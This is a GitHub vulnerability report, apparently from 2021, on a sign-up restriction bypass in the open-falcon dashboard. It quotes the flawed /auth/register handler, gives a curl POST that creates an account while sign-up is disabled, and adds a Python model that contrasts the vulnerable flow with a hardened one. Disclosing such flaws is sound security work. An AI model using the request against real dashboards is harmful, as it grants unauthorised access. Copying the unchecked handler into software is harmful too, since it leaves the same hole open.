
Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register #153

Closed
testivy opened this issue Feb 18, 2021 · 0 comments

Comments

@testivy

testivy commented Feb 18, 2021

Dear Author,
I'm testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem in the registration. See the link below:
http://book.open-falcon.com/en_0_2/quick_install/frontend.html#dashboard-user-management
When we change the value of the item "signup_disable" to "true" in the API configuration file "cfg.json" and then reboot the API, the purpose is to restrict the register function, meaning that the dashboard is only for "sign in", not for "sign up".
I found in the code that I can bypass it under the "/auth/register" interface. In this condition, I can bypass the registration restriction and do as below:
Call the user-add interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing, modifying, and adding.

Vulnerability details
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

# Imports added for context; `app` is assumed to be the dashboard's Flask
# application object (the issue quotes only the handler body).
from flask import request, g, redirect, render_template
from rrd import app


@app.route("/auth/register", methods=["GET", "POST"])
def auth_register():
    # GET: only the session is consulted; signup_disable is never read.
    if request.method == "GET":
        if g.user:
            return redirect("/auth/login")
        return render_template("auth/register.html", **locals())

    # POST: the form fields are read and an account is created,
    # again without consulting signup_disable.
    if request.method == "POST":
        ret = {"msg": ""}

        name = request.form.get("name", "").strip()
        cnname = request.form.get("cnname", "").strip()
        email = request.form.get("email", "").strip()
        password = request.form.get("password", "")
        repeat_password = request.form.get("repeat_password", "")
        # ... remainder of the handler (validation and user creation) is not quoted in the issue

As we can see from the above if branches:
in the `request.method == "GET"` branch, `g.user` is checked and, if it is set, the request is redirected to "/auth/login". But when `request.method == "POST"`, the system reads the request parameters "name, cnname, email, password and repeat_password" and adds an account in the backend. Under these circumstances, we can directly call the "auth/register" interface with the POST method to add a new user.

Reproducing the loophole
1. curl -XPOST 'http://127.0.0.1:8081/auth/register' --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'
As we can see, the register restriction has been bypassed and a new account has been added to the dashboard management without logging in.
The response is as below:
{"msg":""}
2. View the console (screenshot attached in the original issue).

Visit the index page http://127.0.0.1:8081/, then log in with the new account, and you will be able to do anything.

Best Regards
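The handler quoted in the report reads the form in its POST branch without ever consulting the sign-up switch. The following is an added example, not code from the open-falcon project: it models the `/auth/register` control flow as plain Python functions (no Flask needed) so the vulnerable flow and a hardened flow that enforces `signup_disable` before either branch can be run side by side against the exact POST body from the curl command above. `FakeRequest`, `parse_form`, the `users` list and the field-validation rules are assumptions made for the example, not the dashboard's own objects or rules.

```python
import json
from dataclasses import dataclass, field
from urllib.parse import parse_qs


# Constructed stand-in for Flask's request object (assumption, not the project's code).
@dataclass
class FakeRequest:
    method: str
    form: dict = field(default_factory=dict)


def parse_form(body):
    """Turn a urlencoded POST body (like the curl --data in the report) into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def _json(ret):
    # Compact encoding matches the {"msg":""} response quoted in the report.
    return json.dumps(ret, separators=(",", ":"))


def _create_from_form(req, users):
    """Body of the POST branch: read the fields the issue lists and add the user.
    The validation rules here are assumptions for the example, not the dashboard's own."""
    ret = {"msg": ""}
    name = req.form.get("name", "").strip()
    cnname = req.form.get("cnname", "").strip()
    email = req.form.get("email", "").strip()
    password = req.form.get("password", "")
    repeat_password = req.form.get("repeat_password", "")
    if not (name and cnname and email and password):
        ret["msg"] = "missing field"
        return 400, _json(ret)
    if password != repeat_password:
        ret["msg"] = "passwords do not match"
        return 400, _json(ret)
    users.append({"name": name, "cnname": cnname, "email": email})
    return 200, _json(ret)


def register_vulnerable(req, logged_in_user, signup_disable, users):
    """Control flow as quoted in the issue: only GET consults the session,
    and neither branch consults signup_disable, so a POST always creates the account."""
    if req.method == "GET":
        if logged_in_user:
            return 302, "/auth/login"
        return 200, "auth/register.html"
    if req.method == "POST":
        return _create_from_form(req, users)
    return 405, "method not allowed"


def register_hardened(req, logged_in_user, signup_disable, users):
    """Same handler with the configuration enforced before either branch runs:
    when sign-up is disabled, both the form page and the POST are refused."""
    if signup_disable:
        return 403, _json({"msg": "sign up is disabled"})
    return register_vulnerable(req, logged_in_user, signup_disable, users)


def demo():
    """Replay the report's POST body against both handlers with signup_disable=True."""
    body = "name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234"
    req = FakeRequest("POST", parse_form(body))
    users_vuln, users_hard = [], []
    vuln = register_vulnerable(req, None, True, users_vuln)
    hard = register_hardened(req, None, True, users_hard)
    return vuln, len(users_vuln), hard, len(users_hard)


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the vulnerable flow returning `{"msg":""}` and storing the account even though sign-up is disabled, while the hardened flow returns 403 and stores nothing. The design point is that the switch is checked once, at the top of the handler, rather than inside one HTTP-method branch, so no method or branch can be reached without it.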

@testivy testivy closed this as completed Feb 19, 2021